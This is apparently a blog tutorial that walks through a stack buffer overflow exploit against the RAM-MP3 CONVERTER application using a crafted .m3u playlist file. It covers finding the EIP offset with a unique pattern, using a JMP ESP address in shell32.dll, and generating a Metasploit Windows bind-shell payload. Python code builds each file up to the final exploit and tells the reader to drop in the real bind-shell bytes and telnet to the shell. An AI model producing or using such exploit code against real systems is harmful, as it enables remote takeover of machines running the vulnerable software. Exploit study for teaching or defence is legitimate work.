Sunday, 12 February 2012

Exploiting RAM-MP3 CONVERTER (Stack-Based Overflow)

First, let me say thanks to God: "Alhamdulillah".

OK, I will explain how to exploit RAM-MP3 CONVERTER.

1. We'll use a simple Perl script to create a .m3u file that helps us discover more about the vulnerability:
root@justview:~# perl exploit.perl
Copy the file to your Windows XP machine and load it in RAM-MP3 CONVERTER: the application crashes. Next, run RAM-MP3 CONVERTER under OllyDbg, load the file again, and look at the result:
OllyDbg shows the crash in a more graphical way. In the upper-left corner you have the CPU view, which shows assembly instructions and their opcodes (the window is empty because EIP currently points at 41414141, which is not a valid address).


2. We now know that EIP is located somewhere between 15000 and 20000 bytes from the beginning of the buffer. You could simply fill the whole region between 15000 and 20000 with the address you want in EIP. That may work, but it is much cleaner to find the exact location of the overwrite. To determine the exact offset of EIP in our buffer, we need to do some additional work.

First, let's narrow down the location by changing the Perl script a little:

Let's split the buffer. We'll create a file that contains 15000 A's followed by 5000 B's. If EIP contains 41414141 (AAAA), the overwrite happens inside the first 15000 bytes; if EIP contains 42424242 (BBBB), EIP sits between 15000 and 20000.


root@justview:~# perl exploit.perl
Copy the resulting file to Windows and run the application under OllyDbg; it shows:


OK, EIP contains 42424242 (BBBB), so we know EIP's offset is between 15000 and 20000. That also means we should see the remaining B's in memory where ESP points (given that EIP was overwritten before the end of the 20000-byte buffer).



That is great news. We have overwritten EIP with BBBB and we can also see our buffer at ESP.
Before we can start tweaking the script, we need to find the exact location in our buffer that overwrites EIP.
To find that location, we'll use Metasploit.
Metasploit has a nice tool to assist us with calculating the offset. It generates a string made of unique patterns. Using this pattern (and the value of EIP after using the pattern in our malicious .m3u file), we can see exactly how long the buffer must be to write into EIP.
Open the tools folder of the Metasploit framework. You should find a tool called pattern_create.rb. Create a pattern of 5000 characters and write it to a file.
View the result in KWrite.
Edit the Perl script and replace the content of $junk2 with our 5000-character pattern.

3. Edit your script.
Copy the resulting .m3u file to Windows, run RAM-MP3 CONVERTER under OllyDbg, and it shows:
Look at the value of EIP and calculate the offset from it the same way, with pattern_offset.rb from the same tools folder:
result: 2049
2049 is the offset inside the 5000-character pattern at which EIP is overwritten. So if you create a file with 15000 + 2049 = 17049 A's and then add 4 B's (42 42 42 42 in hex), EIP should contain 42424242. We also know that ESP points at data from our buffer, so we'll add some C's after overwriting EIP.
Let's try it. Modify the Perl script to create the new .m3u file.

Copy the resulting .m3u file to Windows, run RAM-MP3 CONVERTER under OllyDbg, and it shows:
EIP = 42424242 (BBBB)
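The offset-finding steps above (split buffer, unique pattern, confirmation file) were done with the author's Perl scripts, which are only shown as screenshots. As an added example that is not part of the original post, the same steps in Python: a re-implementation of what pattern_create.rb and pattern_offset.rb do, and builders for each of the three files. The sizes (15000 + 5000) are the ones used in the post; the crash value used in the demo at the bottom is constructed from the pattern itself, not taken from the author's screenshot.

```python
"""Added example (not the author's Perl scripts): the buffer-layout steps of
the walkthrough, written in Python.  The sizes (15000 + 5000) are the ones
used in the post; the crash value used in the demo at the bottom is
constructed from the pattern itself, not taken from the author's screenshot."""
import struct

JUNK1_LEN = 15000    # A's in front of the region where EIP gets overwritten
REGION_LEN = 5000    # size of that region (offsets 15000..20000 in the file)


def pattern_create(length):
    """Re-implementation of Metasploit's pattern_create.rb: the cyclic
    "Aa0Aa1Aa2..." pattern, in which every 4-byte window is unique for the
    first 20280 bytes (26*26*10 three-byte units)."""
    out = bytearray()
    for upper in b"ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        for lower in b"abcdefghijklmnopqrstuvwxyz":
            for digit in b"0123456789":
                out += bytes((upper, lower, digit))
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(eip_value, pattern):
    """What pattern_offset.rb does: OllyDbg shows EIP as a little-endian
    dword, so pack it back into the byte order it had in the file and
    search the pattern for those 4 bytes.  Returns -1 if not present."""
    return pattern.find(struct.pack("<I", eip_value))


def build_halves():
    """Step 2 of the post: 15000 A's followed by 5000 B's."""
    return b"A" * JUNK1_LEN + b"B" * REGION_LEN


def which_half(eip_value):
    """Interpret the crash produced by build_halves()."""
    if eip_value == 0x41414141:
        return "first"        # overwrite happens inside the first 15000 bytes
    if eip_value == 0x42424242:
        return "second"       # EIP sits between offsets 15000 and 20000
    return "unknown"


def build_pattern_file():
    """Step 3: same 15000 A's, then the 5000-byte unique pattern as $junk2."""
    return b"A" * JUNK1_LEN + pattern_create(REGION_LEN)


def eip_offset_in_file(eip_value):
    """Offset in the whole file at which the 4 bytes that land in EIP start."""
    off = pattern_offset(eip_value, pattern_create(REGION_LEN))
    if off < 0:
        raise ValueError("EIP value %08x is not part of the pattern" % eip_value)
    return JUNK1_LEN + off


def build_verify_file(eip_offset, trailer_len=1000):
    """The confirmation run: A's up to EIP, 4 B's into EIP, C's behind it
    (these C's are what ESP should point at after the crash)."""
    return b"A" * eip_offset + b"BBBB" + b"C" * trailer_len


if __name__ == "__main__":
    # Demo with a constructed crash value: pretend OllyDbg showed the dword
    # that sits at offset 2049 of the pattern (the offset found in the post).
    pat = pattern_create(REGION_LEN)
    fake_eip = struct.unpack("<I", pat[2049:2053])[0]
    print("EIP as OllyDbg would show it: %08X" % fake_eip)
    print("offset inside pattern:", pattern_offset(fake_eip, pat))
    print("offset in file:", eip_offset_in_file(fake_eip))
    with open("verify.m3u", "wb") as f:
        f.write(build_verify_file(eip_offset_in_file(fake_eip)))
```

Run it, copy verify.m3u to the Windows machine and load it under OllyDbg; EIP should read 42424242 and the dump at ESP should show C's. If `pattern_offset` returns -1, the value in EIP did not come from the pattern, which usually means the crash is a different one than you think.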
We control EIP. So we can point EIP somewhere else, to a place that contains our own code (shellcode). But where is that space, how do we put our shellcode there, and how do we make EIP jump to it?

Remember the JMP ESP trick from the WarFTP exploit?
1. Run the application under OllyDbg. From the View menu choose Executable modules.
2. The list of loaded executable modules is shown.
3. Choose a library to serve as the springboard that sends EIP into the stack; we'll use shell32.dll.
4. Double-click the library; a new CPU window opens showing that module's code.
5. Next, search for a JMP ESP inside the module:
       right-click -> Search for -> Command, which opens the command dialog.
6. Type JMP ESP in the command box and press Find.

Note that shell32.dll is an operating-system module, so the address you find is only valid for that Windows version, service pack and language. The address goes into the .m3u file in little-endian byte order, and it should not contain bytes the application may mangle when it reads the playlist (0x00, 0x0a and 0x0d are the usual suspects).



======================================================================
Preparing the payload with Metasploit
After starting msfweb, open a browser at http://127.0.0.1:55555/PAYLOADS.

In the filter, choose OS :: win32,
then Windows Bind Shell.
Configure it as shown and click Generate.

I'm using this payload.

And the result, after loading the generated file into the application:


Now try telnet to the bind shell.
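Putting the JMP ESP step and the payload step together, here is how the final file is assembled, as an added example that is not the author's Perl script. JMP_ESP is a placeholder (an assumption, not the address from the post; paste the one OllyDbg found in shell32.dll), the bad-character list is an assumption about what a text playlist parser is likely to mangle, and the payload is an int3 sled used for a first test run under the debugger instead of the msfweb bind-shell bytes.

```python
"""Added example, not the author's Perl script: assemble the final .m3u once
the EIP offset (17049 in the post), the JMP ESP address from OllyDbg and the
msfweb payload are known.  JMP_ESP below is a PLACEHOLDER (an assumption,
not a value from the post) and the payload is an int3 sled used for a test
run instead of the real bind-shell bytes."""
import struct

EIP_OFFSET = 17049                 # number of A's before the saved return address
JMP_ESP = 0x7C123456               # PLACEHOLDER: paste the address OllyDbg found in shell32.dll
BAD_CHARS = b"\x00\x0a\x0d"        # assumption: bytes a text playlist parser may mangle
NOP = b"\x90"
INT3_SLED = b"\xcc" * 8            # stand-in payload: the debugger breaks on the first int3


def bad_chars_in(data, bad=BAD_CHARS):
    """Return the sorted list of forbidden byte values found in data."""
    return sorted({b for b in data if b in bad})


def address_is_clean(addr, bad=BAD_CHARS):
    """True if the little-endian encoding of addr contains no bad bytes."""
    return not bad_chars_in(struct.pack("<I", addr), bad)


def pack_address(addr):
    """Encode the return address little-endian, the way the CPU reads it off
    the stack, refusing addresses that cannot survive the file format."""
    if not address_is_clean(addr):
        raise ValueError("JMP ESP address %08x contains bad chars" % addr)
    return struct.pack("<I", addr)


def build_exploit(eip_offset, jmp_esp, payload, nop_len=16):
    """Layout: [A * eip_offset][JMP ESP address][NOP sled][payload].
    After the overwritten return address is popped, ESP points into our
    buffer just behind it, so JMP ESP lands on the sled; the NOPs absorb
    a few bytes of misalignment if ESP does not point exactly there."""
    bad = bad_chars_in(payload)
    if bad:
        raise ValueError("payload contains bad chars: %r" % bad)
    return b"A" * eip_offset + pack_address(jmp_esp) + NOP * nop_len + payload


def eip_as_shown(buf, eip_offset):
    """The dword OllyDbg will display in EIP for this file (sanity check)."""
    return struct.unpack("<I", buf[eip_offset:eip_offset + 4])[0]


def bytes_at_esp(buf, eip_offset):
    """What follows the return address, i.e. what JMP ESP executes."""
    return buf[eip_offset + 4:]


if __name__ == "__main__":
    exploit = build_exploit(EIP_OFFSET, JMP_ESP, INT3_SLED)
    print("EIP will show %08X" % eip_as_shown(exploit, EIP_OFFSET))
    print("first bytes at ESP:", bytes_at_esp(exploit, EIP_OFFSET)[:4].hex())
    with open("exploit.m3u", "wb") as f:     # load this in the converter under OllyDbg
        f.write(exploit)
```

With the int3 sled, OllyDbg should stop at the first 0xCC right after the JMP ESP; that proves the jump works before any real payload is involved. Then replace INT3_SLED with the bytes msfweb generated (run them through `bad_chars_in` first) and connect to the bind shell's port with telnet.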


GOOD LUCK ...




